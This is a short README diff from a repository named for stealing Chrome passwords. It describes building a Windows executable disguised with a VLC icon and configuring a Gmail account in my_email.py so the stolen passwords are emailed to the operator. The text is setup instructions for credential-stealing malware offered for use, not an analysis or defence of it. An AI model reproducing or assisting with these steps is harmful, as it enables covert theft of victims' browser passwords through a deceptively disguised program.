hakanonymos/steal-chrome-password-all-version/README.md

  build_local.bat will download and install depandances after he will build your .exe with icon vlc

- if it working

 open my_email.py

 put your gmail email (and password ), email sender

-run  build_email.bat
+run  build_email.bat : will download and install depandances after he will build your .exe with icon vlc

 ## Manuel installation